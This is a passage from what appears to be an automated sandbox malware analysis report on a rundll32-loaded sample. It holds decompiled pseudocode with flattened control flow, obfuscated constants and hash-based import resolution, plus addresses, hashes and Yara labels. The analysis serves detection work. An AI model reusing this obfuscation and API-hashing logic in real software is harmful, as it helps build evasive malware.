							continue;
						}
						if(_t238 == 0x8b9146f) {
							E00259465(_v68, _t237, _v96);
							L23:
							return _t205;
						}
						if(_t238 == 0x93670d9) {
							_t194 = E0025340A(_v80,  &_v32, _v84,  &_v16);
							asm("sbb esi, esi");
							_pop(_t211);
							_t238 = ( ~_t194 & 0xf6f92468) + 0x24090f6a;
							continue;
						}
						if(_t238 == 0x155b4458) {
							_t196 = E002589D3(_t242, _v108,  &_v36, _v56);
							_t237 = _t196;
							_pop(_t211);
							if(_t196 == 0) {
								goto L23;
							}
							_t238 = 0x35a1dc77;
							continue;
						}
						if(_t238 != 0x1b0233d2) {
							goto L20;
						} else {
							_t199 =  *0x25ca2c; // 0x2c8300
							E00256128(_v60, _v88, _v12, _t199 + 0x230, _v64, _v92, _v8 + 1);
							_t202 =  *0x25ca2c; // 0x2c8300
							_t211 = _v16;
							_t243 =  &(_t243[5]);
							_t205 = 1;
							_t238 = 0x24090f6a;
							 *(_t202 + 0x450) = _v16;
							continue;
						}
					}
					if(_t238 == 0x2394b362) {
						_t242 = E0024F4D0(_t211);
						_t238 = 0x155b4458;
						goto L20;
					}
					if(_t238 == 0x24090f6a) {
						E0024F536(_v100, _v44, _v72, _v32);
						_pop(_t211);
						_t238 = 0x8b9146f;
						goto L1;
					}
					if(_t238 != 0x35a1dc77) {
						goto L20;
					}
					_t238 = 0x8b9146f;
					if(_v36 > 2) {
						_t211 = _v48;
						_t204 = E0024EA4C( *((intOrPtr*)(_t237 + 8)), _v76, _v104,  &_v28, _v52);
						_t243 =  &(_t243[4]);
						_v32 = _t204;
						if(_t204 != 0) {
							_t238 = 0x93670d9;
						}
					}
					goto L1;
					L20:
				} while (_t238 != 0x36620d3);
				goto L23;
			}

0x002573ac
0x002573af
0x002573ba
0x002573bc
0x002573c0
0x002573c8
0x002573d0
0x002573d8
0x002573e0
0x002573f2
0x002573f6
0x002573ff
0x00257404
0x0025740a
0x00257412
0x0025741e
0x00257423
0x00257429
0x00257431
0x00257439
0x00257441
0x00257449
0x00257451
0x00257456
0x0025745e
0x00257466
0x0025746e
0x00257476
0x0025747b
0x00257480
0x00257488
0x00257495
0x00257496
0x0025749a
0x002574a2
0x002574aa
0x002574b2
0x002574ba
0x002574c2
0x002574ca
0x002574cf
0x002574d7
0x002574df
0x002574e7
0x002574ef
0x002574f7
0x002574ff
0x00257507
0x0025750c
0x00257514
0x0025751c
0x00257524
0x0025752c
0x00257534
0x00257538
0x00257540
0x00257548
0x00257550
0x00257558
0x00257560
0x00257565
0x0025756d
0x0025757b
0x0025757f
0x00257587
0x00257597
0x0025759c
0x002575a2
0x002575aa
0x002575b2
0x002575ba
0x002575bf
0x002575c4
0x002575cc
0x002575d9
0x002575da
0x002575e4
0x002575e8
0x002575ec
0x002575f4
0x002575f8
0x002575f8
0x002575fc
0x002575fc
0x002575fc
0x002575fc
0x00257602
0x00000000
0x00000000
0x00257608
0x002576e2
0x00000000
0x002576e2
0x00257614
0x00257793
0x0025779c
0x002577a2
0x002577a2
0x00257620
0x002576c4
0x002576ce
0x002576d6
0x002576d7
0x00000000
0x002576d7
0x0025762c
0x00257698
0x0025769d
0x002576a0
0x002576a3
0x00000000
0x00000000
0x002576a9
0x00000000
0x002576a9
0x00257634
0x00000000
0x0025763a
0x00257648
0x00257662
0x00257667
0x0025766e
0x00257675
0x00257678
0x00257679
0x0025767e
0x00000000
0x0025767e
0x00257634
0x002576f2
0x00257774
0x00257776
0x00000000
0x00257776
0x002576fa
0x0025775a
0x00257760
0x00257761
0x00000000
0x00257761
0x00257702
0x00000000
0x00000000
0x00257709
0x0025770e
0x00257728
0x0025772c
0x00257731
0x00257734
0x0025773a
0x00257740
0x00257740
0x0025773a
0x00000000
0x0025777b
0x0025777b
0x00000000

Strings

\, xrefs: 002575CC
'V, xrefs: 0025757F
bo, xrefs: 002575C4

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 'V$\$bo
API String ID: 0-4178943049
Opcode ID: 790a2b9a0549bffce08f638b39bebf1817f0296ec78bce62a8b639c9421d8816
Instruction ID: da8fa5d28774e62d44a97de4ea451242f3033aca1ebc97a85984d97427247034
Opcode Fuzzy Hash: 790a2b9a0549bffce08f638b39bebf1817f0296ec78bce62a8b639c9421d8816
Instruction Fuzzy Hash: 20A1627251C3428FD358CF28D48940BFBF1FBC4758F50892DF99996260D7B58A588F8A

Uniqueness

Uniqueness Score: -1.00%

Function 002496CD, Relevance: 3.9, Strings: 3, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E002496CD(signed int* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				unsigned int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t162;
				signed int _t179;
				void* _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t200;
				intOrPtr* _t222;
				signed int* _t223;
				signed int* _t226;

				_push(_a8);
				_t222 = _a4;
				_t223 = __ecx;
				_push(_t222);
				_push(__ecx);
				E0024602B(_t162);
				_v80 = 0xadf4;
				_t226 =  &(( &_v140)[4]);
				_t200 = 0xade8ac2;
				_t193 = 0x38;
				_v80 = _v80 / _t193;
				_v80 = _v80 ^ 0x00005e4d;
				_v88 = 0xd682;
				_v88 = _v88 ^ 0xf51d39be;
				_v88 = _v88 ^ 0xf51dab09;
				_v96 = 0x72b2;
				_v96 = _v96 ^ 0xfa4c809d;
				_v96 = _v96 ^ 0xfa4c99cb;
				_v116 = 0x90ca;
				_v116 = _v116 | 0x91d06c09;
				_v116 = _v116 ^ 0x5d2d7dc0;
				_v116 = _v116 ^ 0xccfdf140;
				_v124 = 0x94f4;
				_v124 = _v124 >> 9;
				_t194 = 0x7e;
				_v124 = _v124 / _t194;
				_v124 = _v124 >> 1;
				_v124 = _v124 ^ 0x00005a93;
				_v92 = 0xb2da;
				_v92 = _v92 >> 0xf;
				_v92 = _v92 ^ 0x00004526;
				_v132 = 0xfe39;
				_v132 = _v132 ^ 0x94a2bb32;
				_v132 = _v132 + 0xffff197d;
				_v132 = _v132 + 0xa385;
				_v132 = _v132 ^ 0x94a23d21;
				_v104 = 0xe4d2;
				_v104 = _v104 ^ 0x49cfaa80;
				_v104 = _v104 | 0x48b9e868;
				_v104 = _v104 ^ 0x49ffe136;
				_v112 = 0xb598;
				_v112 = _v112 ^ 0x0d96fbe5;
				_v112 = _v112 + 0x88b9;
				_v112 = _v112 ^ 0x0d96d484;
				_v136 = 0x3e03;
				_v136 = _v136 ^ 0x29ac334c;
				_v136 = _v136 >> 9;
				_v136 = _v136 << 8;
				_v136 = _v136 ^ 0x14d602a1;
				_v120 = 0xd3c3;
				_t195 = 0x26;
				_v120 = _v120 / _t195;
				_t196 = 0x3e;
				_v120 = _v120 * 0x17;
				_v120 = _v120 ^ 0x0000f1c0;
				_v140 = 0x72b1;
				_v140 = _v140 + 0xffffab40;
				_v140 = _v140 << 0xe;
				_v140 = _v140 / _t196;
				_v140 = _v140 ^ 0x001e8f72;
				_v128 = 0x9994;
				_v128 = _v128 + 0xffff8c6c;
				_v128 = _v128 + 0xa4f6;
				_t197 = 0x3d;
				_v128 = _v128 / _t197;
				_v128 = _v128 ^ 0x00001242;
				_v100 = 0x8258;
				_v100 = _v100 + 0xffff85b7;
				_v100 = _v100 * 0x51;
				_v100 = _v100 ^ 0x000280a1;
				_v84 = 0x5c44;
				_v84 = _v84 ^ 0x1285eccb;
				_v84 = _v84 ^ 0x12858e57;
				_v108 = 0x7f88;
				_v108 = _v108 | 0x4d438ffe;
				_v108 = _v108 + 0xffff02b4;
				_v108 = _v108 ^ 0x4d436acf;
				do {
					while(_t200 != 0xade8ac2) {
						if(_t200 == 0xeed9730) {
							_push(_t200);
							_push(_t200);
							_t179 = E00248736(_t223[1]);
							 *_t223 = _t179;
							__eflags = _t179;
							if(__eflags != 0) {
								_t200 = 0x173d5c4e;
								continue;
							}
						} else {
							if(_t200 == 0xffe2862) {
								E0025360F( &_v76, _v120, _v140,  *_t222, _v128);
								_t226 =  &(_t226[3]);
								_t200 = 0x220c9c88;
								continue;
							} else {
								if(_t200 == 0x173d5c4e) {
									E002550F2( &_v76, _v104, _v112, _v136, _t223);
									_t226 =  &(_t226[3]);
									_t200 = 0xffe2862;
									continue;
								} else {
									if(_t200 == 0x220c9c88) {
										E00247998(_v100, _v84, __eflags, _t222 + 4,  &_v76, _v108);
									} else {
										if(_t200 != 0x2d9f638c) {
											goto L13;
										} else {
											_t207 = _t222;
											_t223[1] = E00257A0F(_t222);
											_t192 = E002478A5(_t222, _t207, 0x1000, _t207, 0x400);
											_t226 =  &(_t226[4]);
											_t200 = 0xeed9730;
											_t223[1] = _t223[1] + _t192;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t223;
						_t161 =  *_t223 != 0;
						__eflags = _t161;
						return 0 | _t161;
					}
					 *_t223 = 0;
					_t200 = 0x2d9f638c;
					_t223[1] = 0;
					L13:
					__eflags = _t200 - 0x18ac994b;
				} while (__eflags != 0);
				goto L16;
			}

0x002496d7
0x002496de
0x002496e5
0x002496e7
0x002496e9
0x002496ea
0x002496ef
0x002496f7
0x00249700
0x00249707
0x0024970c
0x00249712
0x0024971a
0x00249722
0x0024972a
0x00249732
0x0024973a
0x00249742
0x0024974a
0x00249752
0x0024975a
0x00249762
0x0024976a
0x00249772
0x0024977b
0x00249780
0x00249786
0x0024978a
0x00249792
0x0024979a
0x0024979f
0x002497a7
0x002497af
0x002497b7
0x002497bf
0x002497c7
0x002497cf
0x002497d7
0x002497df
0x002497e7
0x002497ef
0x002497f7
0x002497ff
0x00249807
0x0024980f
0x00249817
0x0024981f
0x00249824
0x00249829
0x00249831
0x0024983d
0x00249842
0x0024984d
0x0024984e
0x00249852
0x0024985a
0x00249862
0x0024986a
0x00249875
0x00249879
0x00249883
0x00249890
0x00249898
0x002498a6
0x002498a9
0x002498ad
0x002498b5
0x002498bd
0x002498ca
0x002498ce
0x002498d6
0x002498de
0x002498e6
0x002498ee
0x002498f6
0x002498fe
0x00249906
0x00249910
0x00249910
0x00249922
0x002499d7
0x002499d8
0x002499dc
0x002499e1
0x002499e5
0x002499e7
0x002499e9
0x00000000
0x002499e9
0x00249928
0x0024992e
0x002499b9
0x002499be
0x002499c1
0x00000000
0x00249930
0x00249932
0x00249995
0x0024999a
0x0024999d
0x00000000
0x00249934
0x0024993a
0x00249a1d
0x00249940
0x00249946
0x00000000
0x0024994c
0x0024994c
0x00249953
0x00249972
0x00249977
0x0024997a
0x0024997f
0x00000000
0x0024997f
0x00249946
0x0024993a
0x00249932
0x0024992e
0x00249a26
0x00249a28
0x00249a2c
0x00249a2c
0x00249a36
0x00249a36
0x002499f0
0x002499f2
0x002499f7
0x002499fa
0x002499fa
0x002499fa
0x00000000

Strings

M^, xrefs: 00249712
D\, xrefs: 002498D6
&E, xrefs: 0024979F

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &E$D\$M^
API String ID: 0-182273106
Opcode ID: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
Instruction ID: d6dbcc5dbf522340502100a5265d4b12de04b34cf2e09851cef04fd84bb33497
Opcode Fuzzy Hash: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
Instruction Fuzzy Hash: F48164715183819FE358CF25C88A81BBBE0BFD8354F50891CF196862A0D3B68A99CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0024153C, Relevance: 3.9, Strings: 3, Instructions: 131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0024153C() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _t116;
				void* _t117;
				void* _t119;
				signed int _t122;
				signed int _t134;
				void* _t136;
				signed int _t137;
				signed int* _t138;

				_t138 =  &_v560;
				_v528 = 0xa2e9;
				_v528 = _v528 + 0xfffffe64;
				_t119 = 0x3a74a7f9;
				_v528 = _v528 ^ 0x0000e8bc;
				_v532 = 0xc148;
				_v532 = _v532 + 0x228e;
				_v532 = _v532 ^ 0x0000dc63;
				_v548 = 0x43c;
				_v548 = _v548 + 0xffff6922;
				_v548 = _v548 | 0xfd2a2fe1;
				_v548 = _v548 ^ 0xb6db9be5;
				_v548 = _v548 ^ 0x4924f3d5;
				_v544 = 0x1b71;
				_v544 = _v544 ^ 0xba1667e6;
				_v544 = _v544 >> 2;
				_v544 = _v544 << 7;
				_v544 = _v544 ^ 0x42cfc722;
				_v540 = 0x29dd;
				_v540 = _v540 + 0xa2;
				_v540 = _v540 ^ 0xc29808bd;
				_v540 = _v540 + 0xffff2b53;
				_v540 = _v540 ^ 0xc2975a13;
				_v556 = 0x7857;
				_v556 = _v556 ^ 0xa059c8e7;
				_v556 = _v556 << 9;
				_v556 = _v556 << 4;
				_v556 = _v556 ^ 0x361613d4;
				_v560 = 0x6ef2;
				_v560 = _v560 ^ 0x7dc12174;
				_v560 = _v560 * 0x52;
				_t136 = 0;
				_v560 = _v560 ^ 0x47eb388f;
				_v536 = 0x33fe;
				_v536 = _v536 + 0x28fb;
				_v536 = _v536 ^ 0x000029c0;
				_v552 = 0x40f6;
				_v552 = _v552 | 0x9b4debbc;
				_v552 = _v552 + 0x1ce1;
				_t134 = 0x7e;
				_t137 = _v536;
				_t135 = _v536;
				_v552 = _v552 / _t134;
				_v552 = _v552 ^ 0x013b83e5;
				_v524 = 0xe5bd;
				_v524 = _v524 ^ 0x97a1ef4c;
				_v524 = _v524 ^ 0x97a11b87;
				do {
					while(_t119 != 0x6cc9294) {
						if(_t119 == 0xcd96d8e) {
							_v560 = 0x65f6;
							_t122 = 0x33;
							_v560 = _v560 / _t122;
							_v560 = _v560 + 0xffffea35;
							_v560 = _v560 ^ 0xd5d8ecd6;
							_t136 =  ==  ? 1 : _t136;
						} else {
							if(_t119 == 0x11374e9c) {
								E0024E29C(_v552, _v524, _t137);
								_t119 = 0xcd96d8e;
								continue;
							} else {
								if(_t119 == 0x31a842b3) {
									_t116 = E00248697();
									_t135 = _t116;
									if(_t116 != 0) {
										_t119 = 0x34255e69;
										continue;
									}
								} else {
									if(_t119 == 0x34255e69) {
										_t117 = E002460B9( &_v520, _v548, _v544, _t119, _v540, _t135, _v556);
										_t138 =  &(_t138[5]);
										if(_t117 != 0) {
											_t119 = 0x6cc9294;
											continue;
										}
									} else {
										if(_t119 != 0x3a74a7f9) {
											goto L14;
										} else {
											_t119 = 0x31a842b3;
											continue;
										}
									}
								}
							}
						}
						L17:
						return _t136;
					}
					_t137 = E002428CE( &_v520, _v560, _v536);
					_t119 = 0x11374e9c;
					L14:
				} while (_t119 != 0x55f7722);
				goto L17;
			}

0x0024153c
0x00241546
0x00241550
0x00241558
0x0024155d
0x00241565
0x0024156d
0x00241575
0x0024157d
0x00241585
0x0024158d
0x00241595
0x0024159d
0x002415a5
0x002415ad
0x002415b5
0x002415ba
0x002415bf
0x002415c7
0x002415cf
0x002415d7
0x002415df
0x002415e7
0x002415ef
0x002415f7
0x002415ff
0x00241604
0x00241609
0x00241611
0x00241619
0x00241626
0x0024162a
0x0024162c
0x00241634
0x0024163c
0x00241644
0x0024164c
0x00241654
0x0024165c
0x0024166a
0x0024166d
0x00241675
0x00241679
0x0024167d
0x00241685
0x0024168d
0x00241695
0x0024169d
0x0024169d
0x002416af
0x0024176c
0x0024177c
0x0024177f
0x00241785
0x0024178e
0x0024179c
0x002416b5
0x002416bb
0x00241733
0x0024173b
0x00000000
0x002416bd
0x002416c3
0x00241715
0x0024171a
0x0024171e
0x00241720
0x00000000
0x00241720
0x002416c5
0x002416cb
0x002416f6
0x002416fb
0x00241700
0x00241706
0x00000000
0x00241706
0x002416cd
0x002416d3
0x00000000
0x002416d9
0x002416d9
0x00000000
0x002416d9
0x002416d3
0x002416cb
0x002416c3
0x002416bb
0x002417a0
0x002417ab
0x002417ab
0x00241757
0x00241759
0x0024175e
0x0024175e
0x00000000

Strings

i^%4, xrefs: 002416C5
Wx, xrefs: 002415EF
i^%4, xrefs: 00241720

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Wx$i^%4$i^%4
API String ID: 0-1584002782
Opcode ID: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
Instruction ID: 9a6875bd73089534b8259cdbf487806d3e6412b84cbdb8d1b73936a09bb66d23
Opcode Fuzzy Hash: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
Instruction Fuzzy Hash: 2D5158711183428FD398CE25C58942BFBE1BBC4758F140E1DF49A962A0D7B4CA69CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00257D03, Relevance: 3.9, Strings: 3, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00257D03() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t105;
				intOrPtr _t112;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				intOrPtr _t117;
				void* _t119;
				void* _t129;
				signed int* _t131;

				_t131 =  &_v44;
				_v8 = 0x68fc;
				_v8 = _v8 + 0xbb36;
				_v8 = _v8 ^ 0x000162e9;
				_v44 = 0xabcf;
				_t114 = 0x5a;
				_v44 = _v44 / _t114;
				_v44 = _v44 << 5;
				_t129 = 0x1aabdcf3;
				_v44 = _v44 ^ 0x41a75d37;
				_v44 = _v44 ^ 0x41a744f3;
				_v12 = 0xa837;
				_v12 = _v12 + 0xbdd3;
				_v12 = _v12 ^ 0x0001592e;
				_v36 = 0x1a64;
				_v36 = _v36 + 0x1ecf;
				_v36 = _v36 | 0x383b765c;
				_v36 = _v36 ^ 0x383b27b5;
				_v40 = 0x1cb7;
				_v40 = _v40 | 0xfad83379;
				_t115 = 0x73;
				_v40 = _v40 / _t115;
				_v40 = _v40 ^ 0x022e74ac;
				_v16 = 0x5673;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x00050551;
				_v20 = 0x8ddb;
				_v20 = _v20 + 0xffffc9bf;
				_t116 = 0x22;
				_v20 = _v20 * 0x54;
				_v20 = _v20 ^ 0x001c9060;
				_v24 = 0x24b0;
				_v24 = _v24 ^ 0x7eaabc9b;
				_v24 = _v24 ^ 0x558f972f;
				_v24 = _v24 ^ 0x2b251b7e;
				_v28 = 0xbf97;
				_v28 = _v28 + 0xffff41a2;
				_v28 = _v28 * 0x14;
				_v28 = _v28 ^ 0x00001fe8;
				_v32 = 0x3a57;
				_v32 = _v32 << 3;
				_v32 = _v32 ^ 0x30418ed0;
				_v32 = _v32 ^ 0x30407688;
				_v4 = 0xf5c8;
				_v4 = _v4 / _t116;
				_v4 = _v4 ^ 0x00000add;
				_t117 =  *0x25ca30; // 0x0
				do {
					while(_t129 != 0x15241428) {
						if(_t129 == 0x1aabdcf3) {
							_push(_t117);
							_push(_t117);
							_t119 = 0x2c;
							_t117 = E00248736(_t119);
							 *0x25ca30 = _t117;
							if(_t117 != 0) {
								_t129 = 0x337355f8;
								continue;
							}
						} else {
							if(_t129 != 0x337355f8) {
								goto L8;
							} else {
								_push(_t117);
								_t112 = E002459D5(_t117, _v36, _t117, _v40, _v16);
								_t117 =  *0x25ca30; // 0x0
								_t131 =  &(_t131[5]);
								_t129 = 0x15241428;
								 *((intOrPtr*)(_t117 + 8)) = _t112;
								continue;
							}
						}
						goto L9;
					}
					_push(_t117);
					_t105 = E00241132(_v20, _t117, _v24, _t117, 0, _v28, _v32, _v4, E0024E377);
					_t117 =  *0x25ca30; // 0x0
					_t131 =  &(_t131[9]);
					_t129 = 0x3afebe4c;
					 *((intOrPtr*)(_t117 + 0x18)) = _t105;
					L8:
				} while (_t129 != 0x3afebe4c);
				L9:
				return 0 | _t117 != 0x00000000;
			}

0x00257d03
0x00257d06
0x00257d10
0x00257d18
0x00257d20
0x00257d30
0x00257d35
0x00257d3b
0x00257d40
0x00257d45
0x00257d52
0x00257d5f
0x00257d6c
0x00257d74
0x00257d7c
0x00257d84
0x00257d8c
0x00257d94
0x00257d9c
0x00257da4
0x00257db0
0x00257db5
0x00257dbb
0x00257dc3
0x00257dcb
0x00257dd0
0x00257dd8
0x00257de0
0x00257ded
0x00257dee
0x00257df2
0x00257dfa
0x00257e02
0x00257e0a
0x00257e12
0x00257e1a
0x00257e22
0x00257e2f
0x00257e33
0x00257e3b
0x00257e43
0x00257e48
0x00257e50
0x00257e58
0x00257e66
0x00257e6a
0x00257e72
0x00257e78
0x00257e78
0x00257e82
0x00257eb7
0x00257eb8
0x00257ebb
0x00257ec3
0x00257ec5
0x00257ecd
0x00257ecf
0x00000000
0x00257ecf
0x00257e84
0x00257e86
0x00000000
0x00257e88
0x00257e88
0x00257e96
0x00257e9b
0x00257ea1
0x00257ea4
0x00257ea6
0x00000000
0x00257ea6
0x00257e86
0x00000000
0x00257e82
0x00257ed3
0x00257ef1
0x00257ef6
0x00257efc
0x00257eff
0x00257f01
0x00257f04
0x00257f04
0x00257f0d
0x00257f1a

Strings

sV, xrefs: 00257DC3
W:, xrefs: 00257E3B
\v;8, xrefs: 00257D8C

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: W:$\v;8$sV
API String ID: 0-492820393
Opcode ID: 41b53c6db3fc11f71e6c57dff9efc5016e8c3da1e159a84caa20216cc7a41fb4
Instruction ID: d277c9e27301c3ebf70812b278307b9f8260fae068e2d51ed1a08e596b26d810
Opcode Fuzzy Hash: 41b53c6db3fc11f71e6c57dff9efc5016e8c3da1e159a84caa20216cc7a41fb4
Instruction Fuzzy Hash: F551AA711183419FD348CF25D88A81FBBE1FB88758F500A1DF486962A0D3B5DA59CF8B

Uniqueness

Uniqueness Score: -1.00%

Function 0024E05A, Relevance: 3.9, Strings: 3, Instructions: 126
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0024E05A(void* __ecx, void* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed short _v40;
				signed int _v44;
				signed int _v48;
				signed int _t107;
				signed short _t113;
				signed short _t116;
				signed short _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				intOrPtr _t124;
				signed short _t128;
				signed short* _t143;
				signed short _t145;
				void* _t146;
				signed int* _t147;

				_t147 =  &_v48;
				_v16 = 0x6d293b;
				_v12 = 0x468ef5;
				_v8 = 0;
				_v4 = 0;
				_t146 = __ecx;
				_v40 = 0x7b4e;
				_v40 = _v40 + 0xffff3b83;
				_v40 = _v40 + 0xffffa7a8;
				_v40 = _v40 ^ 0xffff5e78;
				_v20 = 0xb6a1;
				_t120 = 0x38;
				_v20 = _v20 / _t120;
				_v20 = _v20 ^ 0x00007f71;
				_v44 = 0x997f;
				_v44 = _v44 ^ 0xba9196e9;
				_v44 = _v44 ^ 0x66374254;
				_t26 =  &_v44; // 0x66374254
				_t121 = 0xe;
				_v44 =  *_t26 / _t121;
				_v44 = _v44 ^ 0x0fc29c0d;
				_v48 = 0x4c26;
				_v48 = _v48 | 0xfd76fef6;
				_v48 = _v48 >> 3;
				_v48 = _v48 ^ 0x1faed217;
				_v24 = 0xc5b2;
				_t122 = 0x42;
				_v24 = _v24 * 0x67;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x9f1566f7;
				_v28 = 0x55d;
				_v28 = _v28 << 0xb;
				_v28 = _v28 / _t122;
				_v28 = _v28 ^ 0x0000f55e;
				_v32 = 0x8f6f;
				_t123 = 6;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 + 0xffffe8fc;
				_v32 = _v32 ^ 0x002c0f4c;
				_v36 = 0xd672;
				_v36 = _v36 / _t123;
				_v36 = _v36 + 0xffffc0a7;
				_v36 = _v36 ^ 0xffffa997;
				_t107 = _v40;
				_t124 =  *((intOrPtr*)(__edx + 0x78 + _t107 * 8));
				if(_t124 == 0 ||  *((intOrPtr*)(__edx + 0x7c + _t107 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t145 = _t124 + __ecx;
					while(1) {
						_t110 =  *((intOrPtr*)(_t145 + 0xc));
						if( *((intOrPtr*)(_t145 + 0xc)) == 0) {
							goto L13;
						}
						_t128 = E00254AAF(_t110 + _t146, _v20, _v44, _v48);
						_v40 = _t128;
						__eflags = _t128;
						if(_t128 == 0) {
							L15:
							return 0;
						}
						_t143 =  *_t145 + _t146;
						_t118 =  *((intOrPtr*)(_t145 + 0x10)) + _t146;
						while(1) {
							_t113 =  *_t143;
							__eflags = _t113;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t115 = _t113 + 2 + _t146;
								__eflags = _t113 + 2 + _t146;
							} else {
								_t115 = _t113 & 0x0000ffff;
							}
							_t116 = E00246228(_v24, _v28, _v32, _v36, _t128, _t115);
							_t147 =  &(_t147[4]);
							__eflags = _t116;
							if(_t116 == 0) {
								goto L15;
							} else {
								_t128 = _v40;
								_t143 =  &(_t143[2]);
								 *_t118 = _t116;
								_t118 = _t118 + 4;
								__eflags = _t118;
								continue;
							}
						}
						_t145 = _t145 + 0x14;
						__eflags = _t145;
					}
					goto L13;
				}
			}

0x0024e05a
0x0024e05d
0x0024e065
0x0024e075
0x0024e07b
0x0024e07f
0x0024e081
0x0024e089
0x0024e091
0x0024e099
0x0024e0a1
0x0024e0af
0x0024e0b4
0x0024e0ba
0x0024e0c2
0x0024e0ca
0x0024e0d2
0x0024e0da
0x0024e0de
0x0024e0e3
0x0024e0e9
0x0024e0f1
0x0024e0f9
0x0024e101
0x0024e106
0x0024e10e
0x0024e11b
0x0024e11e
0x0024e122
0x0024e127
0x0024e12f
0x0024e137
0x0024e144
0x0024e148
0x0024e150
0x0024e15d
0x0024e15e
0x0024e162
0x0024e16a
0x0024e172
0x0024e180
0x0024e184
0x0024e18c
0x0024e194
0x0024e198
0x0024e19e
0x0024e21c
0x00000000
0x0024e1a6
0x0024e1a6
0x0024e215
0x0024e215
0x0024e21a
0x00000000
0x00000000
0x0024e1c1
0x0024e1c3
0x0024e1c7
0x0024e1c9
0x0024e227
0x00000000
0x0024e227
0x0024e1d0
0x0024e1d2
0x0024e20c
0x0024e20c
0x0024e20e
0x0024e210
0x00000000
0x00000000
0x0024e1d6
0x0024e1e0
0x0024e1e0
0x0024e1d8
0x0024e1d8
0x0024e1d8
0x0024e1f4
0x0024e1f9
0x0024e1fc
0x0024e1fe
0x00000000
0x0024e200
0x0024e200
0x0024e204
0x0024e207
0x0024e209
0x0024e209
0x00000000
0x0024e209
0x0024e1fe
0x0024e212
0x0024e212
0x0024e212
0x00000000
0x0024e215

Strings

&L, xrefs: 0024E0F1
TB7f, xrefs: 0024E0DA
;)m, xrefs: 0024E05D

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &L$;)m$TB7f
API String ID: 0-1597752287
Opcode ID: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
Instruction ID: 8a034fe38b61b22fdf7d567635567487a0caa02d8bd980a01317fc436f3d04e4
Opcode Fuzzy Hash: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
Instruction Fuzzy Hash: 365177716083028FE718CF25D84591BBBE1FFD4358F104A1DF89996260D7B4DA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 002561B8, Relevance: 3.8, Strings: 3, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

